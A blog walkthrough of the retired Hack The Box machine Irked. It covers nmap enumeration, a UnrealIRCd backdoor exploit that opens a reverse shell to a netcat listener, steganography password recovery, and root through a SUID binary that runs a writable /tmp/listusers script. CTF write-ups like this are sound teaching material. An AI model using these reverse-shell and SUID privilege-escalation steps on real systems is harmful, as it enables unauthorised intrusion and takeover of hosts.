Seguridad x Redes: HTB

For today we will break a retired and easy HTB machine called Irked

You will learn basic enumeration and stenagrophy.

DESCRIPTION

10.10.10.117 - Linux - Easy

ENUMERATION

Port enumeration:

-p- all port
--open: all open
-T5: increase scan speed, aggresive mode.
-v: report in the console
-n: don't apply name resolution
-oN: export results to nmap format

kali:~/htb-vip/irked$ nmap -p- --open -T5 -v -n 10.10.10.117 -oN irked.puertos
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
6697/tcp open ircs-u
8067/tcp open infi-async
52603/tcp open unknown
65534/tcp open unknown

Basic services enumeration:

@kali:~/htb-vip/irked$ nmap -sC -sV -p22,80,111,6697,8067,52603,65534 10.10.10.117 -oN irked.servicios
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 42496/udp6 status
| 100024 1 52603/tcp status
| 100024 1 59968/udp status
|_ 100024 1 60754/tcp6 status
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
52603/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

FOOTHOLD

UnrealIRCd service sounds interesting, let's see if there is any known vulnerability which can be exploited:

searchploit UnrealIRCd

@kali:~/htb-vip/irked$ searchsploit UnrealIRCd
------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service | windows/dos/27407.pl

Backdoor Command Execution sounds interesting, but as we want to get the OSCP, we are not going to use Metasploit

Let's have a look at google: UnrealIRCd 3.2.8.1 exploit github

First entry: Ranger11Danger UnrealIRCd-3.2.8.1-Backdoor

git clone https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor.git

We update the exploit.py exploit with our local IP and port where we will run our listener in order to get the reverse shell:

local_ip = '10.10.14.5'
local_port = '443'

Get reverse shell:

kali# nc -nlvp 443
kali# python exploit.py -payload bash 10.10.10.117 6697

PIVOTING

We get ircd user, but this user is not able to read the user.txt flag, only djmardov user is able to do it, so let's enumerate a bit more:

djmardov enumeration:

ircd@irked$ ls -la /home/djmardov/* -R

Under djmardov home's directory we find a interesting hide file containing a password

/home/djmardov/Documents/.backup
cat /home/djmardov/Documents/.backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

"steg" sounds like steganography, and the website shows an image: irked.jpg

Let's see if the image is hiding something interesting:

alter@kali:~/htb-vip/irked$ steghide extract -sf irked.jpg

It asks for a password, let's provide it with the password we found out in the previous step:

Anotar salvoconducto:

UPupDOWNdownLRlrBAbaSSss

/htb-vip/irked$ cat pass.txt

Kab6h+m+bbp2J:HG

Let's log in with djmardov user:

ircd@irked$ su djmardov
password:Kab6h+m+bbp2J:HG
djmardov@irked:~/Documents$ cat user.txt
4a66a78b12dc0e661a59d3f5c0267a8e
djmardov@irked:~/Documents$

PRIV ESCALATION

We will start with an automate tool, just to have a quick view if we don't find any interesting we will go ahead witth a deeper manual enumaration

So Let's use lse.sh with level 1
https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh

jmardov@irked:/dev/shm$ ./lse.sh -l 1
-
!] fst020 Uncommon setuid binaries........................................ yes!
---
/usr/bin/X
/usr/bin/viewuser

In this case lse.sh returns an interesting file which we don't usually find on a Linux system.

If we have a look at viewuser we see it is executing /tmp/listusers file, so maybe we can take advantage of this to root escalation

djmardov@irked:/dev/shm$ strings /usr/bin/viewuser
WARNING: terminal is not fully functional
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
setuid
puts
system
__cxa_finalize
__libc_start_main
GLIBC_2.0
GLIBC_2.1.3
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
UWVS
[^_]
This application is being devleoped to set and test user permissions
It is still being actively developed
/tmp/listusers
;*2$"
GCC: (Debian 7.2.0-8) 7.2.0

listusers is executed by viewusers which will run as root due to the suid bit.

So we can do listusers to set the suid bit for the/bin/bash binary and as bash is owned by root, it will give us access to a root shell

djmardov@irked:/tmp$ echo "chmod u+s /bin/bash" > listusers
djmardov@irked:/tmp$ chmod 755 listusers
djmardov@irked:/tmp$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2021-06-03 12:54 (:0)
djmardov@irked:/tmp$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1105840 Nov 5 2016 /bin/bash
djmardov@irked:/tmp$ /bin/bash -p
bash-4.3# whoami
root

bash-4.3# cat root.txt

8d8e9e8be64654b6dccc3bff4522daf3

Seguridad x Redes

jueves, 3 de junio de 2021

HTB - Irked

No hay comentarios:

Publicar un comentario

Etiquetas

Archivo del blog